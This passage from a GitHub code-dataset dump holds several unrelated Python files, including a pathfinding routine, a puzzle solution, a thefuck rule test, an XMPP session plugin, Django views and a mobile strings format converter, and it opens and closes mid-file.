filename):\n columns, rows = grid.shape\n with open(filename, \"w+\") as f:\n f.write(str(columns)+\" \"+str(rows)+\"\\n\")\n for row in range(rows):\n for c in grid[row]:\n f.write(MAP_VALUES[c])\n f.write(\"\\n\")\n\n\ndef normalize_grid(static_field):\n return static_field / np.nanmax(static_field[static_field != np.inf])\n\n\ndef compute_static_field(grid, normalize=False):\n q = PriorityQueue()\n grid_nodes = []\n gate = None\n height, width = grid.shape\n for y in range(height):\n grid_nodes.append([])\n for x in range(width):\n coords = (x, y)\n np_coords = (y, x)\n node = Node(coords, grid[np_coords] < 0)\n if grid[np_coords] == 100:\n gate = Node(coords, False)\n node = gate\n grid_nodes[y].append(node)\n\n if not gate:\n raise ValueError(\"Gate is not present in the map. 
Can't compute static field.\")\n\n gate.price = 0\n q.put(gate)\n cnt = 0\n closest_2power = int(ceil(log(width*height) / log(2)))\n closest_2mod = 2**closest_2power\n while q.qsize() > 0:\n cnt += 1\n if cnt % closest_2mod == 0:\n print(q.qsize(), cnt)\n current_node = q.get()\n current_node.visited = True\n while current_node.obstacle:\n current_node = q.get()\n for coords in current_node.neighbours(width, height):\n x, y = coords\n other_node = grid_nodes[y][x]\n if not other_node.obstacle:\n if not other_node.visited:\n other_node.visited = True\n distance = current_node.distance(other_node)\n if current_node.price + distance < other_node.price:\n other_node.enter(current_node)\n q.put(other_node)\n static_field = np.zeros(grid.shape)\n for x in range(width):\n for y in range(height):\n np_coords = (y, x)\n static_field[np_coords] = grid_nodes[y][x].price\n if normalize:\n return normalize_grid(static_field)\n return static_field\n","repo_name":"bumbac/MT","sub_path":"src/roommodel/utils/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":4350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"33548440302","text":"seq=int(input())\nmr,mi=map(int,input().split())\nlst=[[i for i in input()] for i in range(seq)]\npr,pi=[i for i in range(seq) if \"p\" in lst[i]][0],[i.index(\"p\") for i in lst if \"p\" in i][0]\nif pr==mr:\n print(\"LEFT\" if pi<mi else \"RIGHT\")\n\nelse:\n def upanddown(lst, ups=None):\n if ups is None: ups = []\n for i in lst:\n if \"m\" in i:m=i.index(\"m\");break\n ups.append(i)\n return ups,lst[[\"m\" in i for i in lst].index(True)+1:]\n up,down=upanddown(lst)\n ppos=lambda :\"DOWN\" if any([\"p\" in i for i in down]) else \"UP\" #if any([\"p\" in i for i in up]) else \"mid\"\n moves=[]\n [moves.append(ppos()) for i in range(abs(mr-pr))]\n [moves.append(\"LEFT\" if pi<mi else \"RIGHT\") for i in range(abs(mi-pi))]\n print(moves[0])","repo_name":"Ahmedabied/Practice_Solutions","sub_path":"Bot_saves_princess-2.py","file_name":"Bot_saves_princess-2.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73035539893","text":"import pytest\nfrom thefuck.rules.git_add_force import match, get_new_command\nfrom tests.utils import Command\n\n\n@pytest.fixture\ndef stderr():\n return ('The following paths are ignored by one of your .gitignore files:\\n'\n 'dist/app.js\\n'\n 'dist/background.js\\n'\n 'dist/options.js\\n'\n 'Use -f if you really want to add them.\\n')\n\n\ndef test_match(stderr):\n assert match(Command('git add dist/*.js', stderr=stderr))\n assert not match(Command('git add dist/*.js'))\n\n\ndef test_get_new_command(stderr):\n assert get_new_command(Command('git add dist/*.js', stderr=stderr)) \\\n == \"git add --force dist/*.js\"\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/nvbn_thefuck/thefuck-master/tests/rules/test_git_add_force.py","file_name":"test_git_add_force.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
{"seq_id":"4364533463","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\"\"\"\nModel for CLDC task\n\"\"\"\n\n#************************************************************\n# Imported Libraries\n#************************************************************\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\n\nfrom xling_embedding_layer import XlingEmbeddingLayer\nfrom encoder import 
Encoder\nfrom inferer import Inferer\nfrom mlp.cldc_classifier import CLDCClassifier\nfrom xlingva import XlingVA\n\nimport pdb\n\n\nclass CLDCModel(nn.Module):\n def __init__(self, params, data_list, classifier_config, model_dict = None):\n super(CLDCModel, self).__init__()\n # embedding layer\n self.embeddings = XlingEmbeddingLayer(params, data_list)\n # encoder\n self.encoder = Encoder(params)\n # inferer\n self.inferer = Inferer(params, params.inf_in_dim)\n\n # load pretrained model\n if model_dict is not None:\n XlingVA.init_model(self, model_dict)\n \n # CLDC classifier \n self.cldc_classifier = CLDCClassifier(params, classifier_config)\n \n self.use_cuda = params.cuda\n if self.use_cuda:\n self.cuda()\n\n\n def get_gaus(self, lang, batch_in, batch_lens):\n # embedding\n input_word_embs = self.embeddings(lang, batch_in)\n # encoding\n hid = self.encoder(input_word_embs, batch_lens)\n # infering\n mu, logvar = self.inferer(hid)\n return mu, logvar\n\n\n def forward(self, lang, batch_in, batch_lens, batch_lb = None, vis = False):\n # embedding\n input_word_embs = self.embeddings(lang, batch_in)\n # encoding\n hid = self.encoder(input_word_embs, batch_lens)\n # infering\n mu, logvar = self.inferer(hid)\n z = self.inferer.reparameterize(mu, logvar)\n # classifier\n loss, pred_p, pred = self.cldc_classifier(z, batch_lb, self.training, vis=vis)\n #loss, pred_p, pred = self.cldc_classifier(hid, batch_lb, self.training, vis = vis)\n return loss, pred_p, pred\n","repo_name":"cambridgeltl/mling_sdgms","sub_path":"nn_model/cldc_model.py","file_name":"cldc_model.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"4167579731","text":"import csv\nimport json\nimport os\nimport re\nimport warnings\nfrom contextlib import redirect_stderr, redirect_stdout\nfrom pathlib import Path\nfrom typing import List\n\nimport gspread\nimport openpyxl\nimport yaml\nfrom arabic_reshaper import reshape\nfrom bidi.algorithm import get_display\nfrom console_style import ConsoleStyle\nfrom fpdf import FPDF\nfrom google.oauth2.credentials import Credentials\nfrom lingua import LanguageDetectorBuilder\n\n\ndef convert_strings(\n input_filepath: Path, output_filepath: Path, should_print_comments: bool\n):\n \"\"\"\n Extracts strings from the input file in either .xml or .strings format and converts\n them to the desired output file format. 
The output file format can be any of the\n following:\n\n - Android strings format (*.xml)\n - CSV\n - HTML\n - iOS strings format (*.strings)\n - JSON\n - MD\n - ODS\n - PDF\n - XLSX\n - YAML\n\n :param input_filepath: .strings or .xml file to extract the strings\n :type input_filepath: Path\n :param output_filepath: Name of the sheet to be generated\n :type output_filepath: Path\n :param should_print_comments: True if the user wants to print comments from\n .strings/.xml to the output file\n :type should_print_comments: bool\n \"\"\"\n\n strings = get_strings(input_filepath, should_print_comments)\n\n if output_filepath:\n conversion_functions = {\n \".csv\": to_csv,\n \".xlsx\": to_sheet,\n \".ods\": to_sheet,\n \".md\": to_md,\n \".json\": to_json,\n \".yaml\": to_yaml,\n \".html\": to_html,\n \".strings\": to_ios,\n \".xml\": to_android,\n \".pdf\": to_pdf,\n }\n\n if output_filepath.suffix in conversion_functions:\n conversion_functions[output_filepath.suffix](strings, output_filepath)\n\n print(\n f\"{ConsoleStyle.GREEN}Data successfully written to {output_filepath}\"\n f\"{ConsoleStyle.END}\"\n )\n else:\n raise ValueError(\n f\"{ConsoleStyle.YELLOW}File type not supported. Feel free to create \"\n f\"an issue here (https://github.com/HenestrosaConH/mobile-strings\"\n f\"-converter/issues) if you want the file type to be supported by the \"\n f\"package.{ConsoleStyle.END}\"\n )\n\n\ndef get_strings(input_filepath: Path, should_print_comments: bool):\n \"\"\"\n Creates a Google spreadsheet with the extracted strings from the input filepath\n\n :param input_filepath: .strings or .xml file to extract the strings\n :type input_filepath: Path\n :param should_print_comments: True if the user wants to print comments from\n .strings/.xml to the file\n :type should_print_comments: bool\n \"\"\"\n\n if input_filepath.suffix == \".strings\":\n if should_print_comments:\n pattern = r'\"(.*?)\"\\s*=\\s*\"((?:[^\"\\\\]|\\\\.)*)\"\\s*;'\n else:\n pattern = r'^(?!\\s*//)\\s*\"(.+?)\"\\s*=\\s*\"((?:[^\"\\\\]|\\\\.)*)\"\\s*;'\n elif input_filepath.suffix == \".xml\":\n if should_print_comments:\n pattern = r'<string name=\"(.*?)\">(.*?)</string>'\n else:\n pattern = r'^(?!\\s*<!--)\\s*<string name=\"(.*?)\">(.*?)</string>(?!\\s*-->)'\n else:\n raise ValueError(\n \"The extension of the provided file must be .strings for iOS or .xml \"\n \"Android\"\n )\n\n # Open the Localizable.strings file\n with open(input_filepath, \"r\", encoding=\"utf-8\") as file:\n strings_data = file.read()\n\n # Extract the strings using a regular expression\n strings = re.findall(pattern, strings_data, re.MULTILINE)\n\n if len(strings) >= 1:\n return strings\n else:\n raise ValueError(\n \"The file provided is not a valid Localizable.strings nor strings.xml file.\"\n )\n\n\ndef to_google_sheets(\n input_filepath: Path,\n sheet_name: str,\n credentials_filepath: Path,\n should_print_comments: bool,\n):\n \"\"\"\n Creates a Google spreadsheet with the extracted strings from the input filepath\n\n :param input_filepath: .strings or .xml file to extract the strings\n :type input_filepath: Path\n :param sheet_name: Name of the sheet to be generated\n :type sheet_name: str\n :param credentials_filepath: Path to the service_account.json in order to be able\n to create the sheet in the user's Google account\n :type credentials_filepath: Path\n :param should_print_comments: True if the user wants to print comments from\n .strings/.xml to the sheet\n :type should_print_comments: bool\n \"\"\"\n\n strings = 
get_strings(input_filepath, should_print_comments)\n\n # Authenticate with Google Sheets API\n scope = [\n \"https://spreadsheets.google.com/feeds\",\n \"https://www.googleapis.com/auth/drive\",\n ]\n credentials = Credentials.from_service_account_file(credentials_filepath, scope)\n client = gspread.authorize(credentials)\n\n # Open a new sheet or an existing one\n sheet = client.open(sheet_name).sheet1\n\n # Clear the existing data in the sheet\n sheet.clear()\n\n # Write the data to the sheet\n for string in strings:\n sheet.append_row(string)\n\n\ndef to_csv(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .csv file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\", newline=\"\") as file:\n writer = csv.writer(file)\n\n # Write the header row\n header = [\"name\", \"value\"]\n writer.writerow(header)\n\n # Write the data to the file\n for name, value in strings:\n writer.writerow([name, value])\n\n\ndef to_sheet(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .xlsx / .ods file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Create a new workbook\n workbook = openpyxl.Workbook()\n\n # Create a new sheet\n sheet = workbook.active\n\n # Write the header row\n sheet.cell(row=1, column=1, value=\"NAME\")\n sheet.cell(row=1, column=2, value=\"VALUE\")\n\n # Write the data to the sheet\n for i, (name, value) in enumerate(strings, start=2):\n sheet.cell(row=i, column=1, value=name)\n sheet.cell(row=i, column=2, value=value)\n\n # Save the file\n workbook.save(output_filepath)\n\n\ndef to_json(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .json file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Create a list of dictionaries to store the data\n data_list = []\n for name, value in strings:\n data_list.append({\"name\": name, \"value\": value})\n\n # Write the data to the JSON file\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n json.dump(data_list, file, ensure_ascii=False, indent=2)\n\n\ndef to_yaml(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .yaml file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Convert the data to a dictionary\n strings_dict = {name: value for name, value in strings}\n\n # Write the data to the YAML file\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n yaml.dump(strings_dict, file, default_flow_style=False, allow_unicode=True)\n\n\ndef to_html(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .html file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Create an HTML file\n with open(output_filepath, \"w\", encoding=\"utf-8\") as 
file:\n file.write(\"<head>\\n\")\n file.write('\\t<meta charset=\"UTF-8\">\\n')\n file.write(\"</head>\\n\")\n file.write(\"<table>\\n\")\n file.write(\"\\t<thead>\\n\")\n file.write(\"\\t\\t<tr>\\n\")\n file.write(\"\\t\\t\\t<th>NAME</th>\\n\")\n file.write(\"\\t\\t\\t<th>VALUE</th>\\n\")\n file.write(\"\\t\\t</tr>\\n\")\n file.write(\"\\t</thead>\\n\")\n file.write(\"\\t<tbody>\\n\")\n\n # Write the data to the HTML file\n for name, value in strings:\n file.write(\"\\t\\t<tr>\\n\")\n file.write(f\"\\t\\t\\t<td>{name}</td>\\n\")\n file.write(f\"\\t\\t\\t<td>{value}</td>\\n\")\n file.write(\"\\t\\t</tr>\\n\")\n\n file.write(\"\\t</tbody>\\n\")\n file.write(\"</table>\\n\")\n\n\ndef to_ios(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .strings file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n for string in strings:\n file.write(f'\"{string[0]}\" = \"{string[1]}\";\\n')\n\n\ndef to_android(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .xml file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\") as file:\n file.write(\"<resources>\\n\")\n for string in strings:\n file.write(f'\\t<string name=\"{string[0]}\">{string[1]}</string>\\n')\n\n file.write(\"</resources>\")\n\n\ndef to_pdf(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .pdf file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n # Ignore the following warning when adding a font already added:\n # UserWarning: Core font or font already added 'dejavusanscondensed': doing nothing\n warnings.filterwarnings(\"ignore\", category=UserWarning)\n\n def add_font(font_name, size=12):\n root_dir = Path(__file__).parent\n pdf.add_font(fname=str(root_dir / f\"assets/fonts/{font_name}.ttf\"))\n pdf.set_font(font_name, size=size)\n\n # Create a new PDF file\n pdf = FPDF(orientation=\"P\", format=\"A4\")\n pdf.add_page()\n pdf.set_font(\"Arial\", \"B\", 12)\n\n # Cell properties\n c_width = 95\n c_height = 10\n\n # Add headers to table\n pdf.cell(c_width, c_height, \"NAME\", border=1)\n pdf.cell(c_width, c_height, \"VALUE\", border=1)\n pdf.ln()\n\n detector = (\n LanguageDetectorBuilder.from_all_languages()\n .with_preloaded_language_models()\n .build()\n )\n\n # Add table data\n # https://stackoverflow.com/questions/53526311/fpdf-multicell-same-height\n for i, string in enumerate(strings):\n x = pdf.get_x()\n y = pdf.get_y()\n\n max_height = 0\n cells_in_row = 2\n\n for j in range(cells_in_row):\n language_code = None\n try:\n if j % 2 == 0: # Prevents 'name' language detection\n add_font(\"DejaVuSansCondensed\")\n else:\n language_code = detector.detect_language_of(\n string[j]\n ).iso_code_639_1.name.lower()\n\n if language_code in [\n \"bn\", # Bengali\n \"hi\", # Hindi\n \"kn\", # Kannada\n \"ml\", # Malayalam\n \"mr\", # Marathi\n \"or\", # Oriya\n \"bo\", # Tibetan\n ]:\n add_font(\"gargi\")\n elif language_code == \"gu\": # Gujarati\n add_font(\"Aakar\")\n 
elif language_code == \"te\": # Telugu\n add_font(\"AnekTelugu-VariableFont_wdth,wght\")\n elif language_code == \"ta\": # Tamil\n add_font(\"latha\")\n elif language_code == \"pa\": # Punjabi, Panjabi\n add_font(\"Gurvetica_a8_Heavy\")\n elif language_code == \"zh\" or language_code == \"ja\":\n # Chinese or Japanese\n add_font(\"fireflysung\")\n elif language_code == \"ko\": # Korean\n add_font(\"Eunjin\")\n elif language_code == \"th\": # Thai\n add_font(\"Waree\")\n else:\n add_font(\"DejaVuSansCondensed\")\n\n if language_code in [\n # RTL languages\n \"ar\", # Arabic\n \"he\", # Hebrew\n \"dv\", # Dhivehi\n \"ku\", # Kurdish (sorani)\n \"ps\", # Pashto\n \"fa\", # Persian\n \"sd\", # Sindhi\n \"ur\", # Urdu\n \"ug\", # Uyghur\n \"yi\", # Yiddish\n ]:\n pdf.multi_cell(c_width, c_height, get_display(reshape(string[j])))\n else:\n pdf.multi_cell(c_width, c_height, string[j])\n\n if pdf.get_y() - y > max_height:\n max_height = pdf.get_y() - y\n\n pdf.set_xy(x + (c_width * (j + 1)), y)\n except (Exception,):\n with open(\n output_filepath.parent / f\"{output_filepath.stem}-errors.txt\",\n \"a\",\n encoding=\"utf-8\",\n ) as f:\n f.write(f\"{string[1]} not supported\\n\")\n\n for j in range(cells_in_row + 1):\n pdf.line(x + c_width * j, y, x + c_width * j, y + max_height)\n\n pdf.line(x, y, x + c_width * cells_in_row, y)\n pdf.line(x, y + max_height, x + c_width * cells_in_row, y + max_height)\n\n pdf.ln()\n\n if (\n i < len(strings) - 1\n and pdf.get_y() + (max_height * cells_in_row) > pdf.h - 10\n ):\n pdf.add_page()\n\n # Inside this context manager, all output to stdout and stderr will be suppressed\n # This is done because in Windows, the following exception is raised if the\n # strings.xml file contains unsupported characters:\n #\n # UnicodeEncodeError: 'charmap'\n # codec can't encode characters in position 0-9: character maps to <undefined>\n with open(os.devnull, \"w\") as devnull:\n with redirect_stdout(devnull), redirect_stderr(devnull):\n # Save the PDF file\n pdf.output(str(output_filepath))\n\n\ndef to_md(strings: List[str], output_filepath: Path):\n \"\"\"\n Formats strings to a .md file\n\n :param strings: Strings extracted from a .strings or .xml file\n :type strings: List[str]\n :param output_filepath: The path where the generated file will be saved.\n :type output_filepath: Path\n \"\"\"\n\n with open(output_filepath, \"w\", encoding=\"utf-8\") as f:\n # Write each string to the Markdown file in a table format\n f.write(\"| NAME | VALUE |\\n\")\n f.write(\"| ----------- | ----------- |\\n\")\n for name, translation in strings:\n f.write(f\"| {name} | {translation} |\\n\")\n","repo_name":"HenestrosaConH/mobile-strings-converter","sub_path":"src/mobile_strings_converter/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":15837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11621169016","text":"# pylint: disable-all # Pylint seems to crash when looking into praw.\n# mypy: ignore-errors\n# Mypy doesn't have praw stubs libraries.\nimport datetime\nfrom typing import Iterator, Optional\n\nimport praw\nfrom praw.models import Subreddit\n\nfrom src.config.config import CONFIG\n\n\nclass RedditClient:\n __DATA_FILE: str = \"kpopSubReddit.txt\"\n __LIMIT_NB_POSTS_RETRIEVED: Optional[int] = None\n\n def __init__(self):\n self.reddit = praw.Reddit(\n client_id=CONFIG.REDDIT_CLIENT_ID,\n client_secret=CONFIG.REDDIT_CLIENT_SECRET,\n user_agent=CONFIG.REDDIT_USER_AGENT,\n )\n\n def 
getPosts(self):\n subredditName: str = \"kpop\"\n subreddit: Subreddit = self.reddit.subreddit(subredditName)\n posts: Iterator = subreddit.new(limit=self.__LIMIT_NB_POSTS_RETRIEVED)\n\n with open(CONFIG.DATA_PATH + self.__DATA_FILE, mode=\"wb\") as file:\n for post in posts:\n if post.link_flair_text.upper() in CONFIG.REDDIT_FLAIR_TAGS:\n date = datetime.datetime.fromtimestamp(post.created).strftime(\n \"%Y/%m/%d\"\n )\n print(\n f\"{post.link_flair_text} {post.title} {post.shortlink} {date}.\"\n )\n file.write(\n f\"{post.link_flair_text} {post.title} {post.shortlink} {date}.\\n\".encode(\n \"utf-8\"\n )\n )\n","repo_name":"golem-ai/showcases","sub_path":"graphKpop/src/service/redditClient.py","file_name":"redditClient.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25805969235","text":"\nimport asyncio\nimport logging\n\nfrom slixmpp.stanza import Iq, StreamFeatures\nfrom slixmpp.xmlstream import register_stanza_plugin\nfrom slixmpp.plugins import BasePlugin\n\nfrom slixmpp.features.feature_session import stanza\nfrom typing import ClassVar, Set\n\n\nlog = logging.getLogger(__name__)\n\n\nclass FeatureSession(BasePlugin):\n\n name = 'feature_session'\n description = 'RFC 3920: Stream Feature: Start Session'\n dependencies: ClassVar[Set[str]] = set()\n stanza = stanza\n\n def plugin_init(self):\n self.xmpp.register_feature('session',\n self._handle_start_session,\n restart=False,\n order=10001)\n\n register_stanza_plugin(Iq, stanza.Session)\n register_stanza_plugin(StreamFeatures, stanza.Session)\n\n async def _handle_start_session(self, features):\n \"\"\"\n Handle the start of the session.\n\n Arguments:\n feature -- The stream features element.\n \"\"\"\n if features['session']['optional']:\n self.xmpp.sessionstarted = True\n self.xmpp.event('session_start')\n return\n\n iq = self.xmpp.Iq()\n iq['type'] = 'set'\n iq.enable('session')\n await iq.send(callback=self._on_start_session_response)\n\n def _on_start_session_response(self, response):\n self.xmpp.features.add('session')\n\n log.debug(\"Established Session\")\n self.xmpp.sessionstarted = True\n self.xmpp.event('session_start')\n","repo_name":"poezio/slixmpp","sub_path":"slixmpp/features/feature_session/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"21"} +{"seq_id":"5586310034","text":"import pandas as pd\nfrom selenium import webdriver\nimport json\nimport os\n\n# Global Variables \nPDF_savepath = './Downloads' # Edit here to change save directory\nwebdriver_path = './chromedriver' # Edit this to the chrome webdriver location. Visit https://chromedriver.chromium.org/downloads and https://www.google.com/chrome/ to download webdriver and chrome browser.\nreference = pd.read_csv('reference.csv') # List of pages to be archived\n\n# Download function\ndef download(url,name,PDF_savepath = PDF_savepath,webdriver_path = webdriver_path):\n '''\n Download the webpage and save as PDF to PDF_savepath.\n\n url: URL format string. The link to the page.\n name: String. Name of the downloaded file.\n PDF_savepath: Directory format string. Where to store the downloaded file. Default to be specified in Global Variables.\n webdriver_saverpath: Directory format string. Path to the webdriver. 
Default to be specified in Global Variables.\n '''\n # Specify download preferences\n chrome_options = webdriver.ChromeOptions()\n appState = {\n 'recentDestinations': [\n {\n 'id': 'Save as PDF',\n 'origin': 'local',\n 'account': ''\n }\n ],\n 'selectedDestinationId': 'Save as PDF',\n 'version': 2\n }\n prefs = {\n 'printing.print_preview_sticky_settings.appState': json.dumps(appState), \n 'savefile.default_directory': PDF_savepath,\n }\n chrome_options.add_experimental_option(\"prefs\", prefs)\n chrome_options.add_argument('--kiosk-printing')\n # chrome_options.add_argument('-headless') # I don't know why headless mode doesn't work...\n # Start running the browser\n driver = webdriver.Chrome(webdriver_path, options=chrome_options) \n driver.implicitly_wait(10)\n driver.get(url)\n driver.execute_script('window.print();')\n driver.close()\n # Rename\n os.chdir(PDF_savepath)\n files = filter(os.path.isfile, os.listdir(PDF_savepath))\n files = [os.path.join(PDF_savepath, f) for f in files]\n files.sort(key=lambda x: os.path.getmtime(x))\n newest_file = files[-1]\n os.rename(newest_file, name +\".pdf\")\n\n# Parse the list, feel free to modify to cope with desired category format\nfor i in range(len(reference)):\n url = reference.iloc[i]['url']\n name = reference.iloc[i]['name']\n download(url, name)\n print(name + ' downloaded')","repo_name":"pool-bear/webpage-to-pdf","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33093903020","text":"from django.http import JsonResponse\nfrom django.views import View\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom django.core.exceptions import FieldError\n\nfrom products.models import FirstCategory, Product\n\nclass FirstCategoryView(View):\n def get(self, request):\n first_categories = FirstCategory.objects.all()\n\n results = [{\n 'first_category_id' : first_category.id,\n 'first_category_title': first_category.name,\n 'second_categories':[{\n 'second_category_id' : second_category.id,\n 'second_category_title': second_category.name\n }for second_category in first_category.secondcategory_set.all()]\n }for first_category in first_categories]\n\n return JsonResponse({'results': results}, status=200)\n\n\nclass ProductDetailView(View):\n def get(self, request, product_id):\n product = Product.objects\\\n .select_related(\"second_category__first_category\",\"brand\")\\\n .prefetch_related('productoption_set__size','productoption_set__color','additional_product','thumbnailimage_set')\\\n .get(id = product_id)\n\n result={\n 'product_id' : product.id,\n 'first_category' : [{\n 'first_category_id' : product.second_category.first_category.id,\n 'first_category_name': product.second_category.first_category.name\n }],\n 'second_category' : [{\n 'second_category_id' : product.second_category.id,\n 'second_category_name': product.second_category.name\n }],\n 'brand' : product.brand.name,\n 'title' : product.title,\n 'price' : product.price,\n 'thumbnail_images' : [thumbnailimage.url for thumbnailimage in product.thumbnailimage_set.all()],\n 'additional_products' : [additional_product.title for additional_product in product.additional_product.all()],\n 'product_options' : [{\n 'size_option' : productoption.size.name,\n 'color_option' : productoption.color.name,\n 'additional_price': productoption.additional_price\n }for productoption in product.productoption_set.all()]\n }\n\n 
return JsonResponse({'result': result }, status=200)\n\n\nclass ProductListView(View):\n def get(self, request):\n first_category_id = request.GET.get('first_category')\n second_category_id = request.GET.get('second_category')\n color = request.GET.get('color')\n size = request.GET.get('size')\n sort = request.GET.get('sort', 'id')\n limit = int(request.GET.get(\"limit\", 8))\n offset = int(request.GET.get(\"offset\", 1))\n\n product_Q = Q()\n\n if second_category_id:\n product_Q = Q(second_category = second_category_id)\n\n elif first_category_id:\n product_Q = Q(second_category__first_category_id = first_category_id)\n \n if color:\n product_Q &= Q(productoption__color__name=color)\n\n if size:\n product_Q &= Q(productoption__size__name=size)\n \n sort_menu={\n 'id' : 'id',\n 'high_price': '-price',\n 'low_price' : 'price',\n 'best' : 'productoption__stock'\n }\n\n if not sort in sort_menu:\n return JsonResponse({\"message\": \"SORT_INVALID_VALUE\"})\n \n products = Product.objects.filter(product_Q).order_by(sort_menu.get(sort))\\\n .select_related('second_category__first_category','brand')\n\n p = Paginator(products, limit)\n\n results = [{\n 'product_id' : product.id,\n 'title' : product.title,\n 'brand' : product.brand.name,\n 'price' : product.price,\n 'first_category_id' : product.second_category.first_category.id,\n 'second_category_id': product.second_category.id,\n 'main_image' : product.main_image,\n }for product in p.page(offset)]\n\n return JsonResponse({\"results\":results, \"exist_nest_page\":p.page(offset).has_next()},status = 200)\n","repo_name":"wecode-bootcamp-korea/35-2nd-nhouse-backend","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7996466472","text":"from datetime import timedelta\nfrom typing import Dict, Tuple, Union\n\nimport arrow\n\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import transaction\nfrom django.db.models.query import QuerySet\nfrom django.utils import timezone\n\nfrom Mark.models import Annotation, MarkingTask\nfrom Mark.services import MarkingTaskService\n\n\nclass UserInfoServices:\n \"\"\"Functions for User Info HTML page.\"\"\"\n\n @transaction.atomic\n def annotation_exists(self) -> bool:\n \"\"\"Return True if there are any annotations in the database.\n\n Returns:\n bool : True if there are annotations or\n False if there aren't any\n \"\"\"\n return Annotation.objects.exists()\n\n @transaction.atomic\n def get_total_annotations_count_based_on_user(self) -> Dict[str, int]:\n \"\"\"Retrieve annotations based on user.\n\n Returns:\n Dict[str, int]: A dictionary of all annotations(Value) corresponding with the markers(key).\n\n Raises:\n Not expected to raise any exceptions.\n \"\"\"\n annotations = (\n MarkingTaskService().get_latest_annotations_from_complete_marking_tasks()\n )\n markers_and_managers = User.objects.filter(\n groups__name__in=[\"marker\"]\n ).order_by(\"groups__name\", \"username\")\n annotation_count_dict: Dict[str, int] = {\n user.username: 0 for user in markers_and_managers\n }\n\n for annotation in annotations:\n if annotation.user.username in annotation_count_dict:\n annotation_count_dict[annotation.user.username] += 1\n\n return annotation_count_dict\n\n @transaction.atomic\n def get_annotations_based_on_user(\n self, annotations\n ) -> Dict[str, Dict[Tuple[int, int], Dict[str, Union[int, 
str]]]]:\n \"\"\"Retrieve annotations based on the combination of user, question number, and version.\n\n Returns a dictionary with users as keys and nested dictionaries as values.\n The nested dictionaries have a tuple (question_number, question_version) as keys\n and the count of annotations and average marking time as values.\n\n Returns:\n Dict[str, Dict[Tuple[int, int], Dict[str, Union(int, str)]]]: A dictionary with users\n as keys, and nested dictionaries as values containing the count of annotations\n and average marking time for each (question_number, question_version) combination.\n \"\"\"\n count_data: Dict[str, Dict[Tuple[int, int], int]] = dict()\n total_marking_time_data: Dict[str, Dict[Tuple[int, int], int]] = dict()\n\n for annotation in annotations:\n key = (annotation.task.question_number, annotation.task.question_version)\n count_data.setdefault(annotation.user.username, {}).setdefault(key, 0)\n count_data[annotation.user.username][key] += 1\n\n total_marking_time_data.setdefault(annotation.user.username, {}).setdefault(\n key, 0\n )\n total_marking_time_data[annotation.user.username][\n key\n ] += annotation.marking_time\n\n grouped_by_user: Dict[\n str, Dict[Tuple[int, int], Dict[str, Union[int, str]]]\n ] = dict()\n\n for user in count_data:\n grouped_by_user[user] = dict()\n for key in count_data[user]:\n count = count_data[user][key]\n total_marking_time = 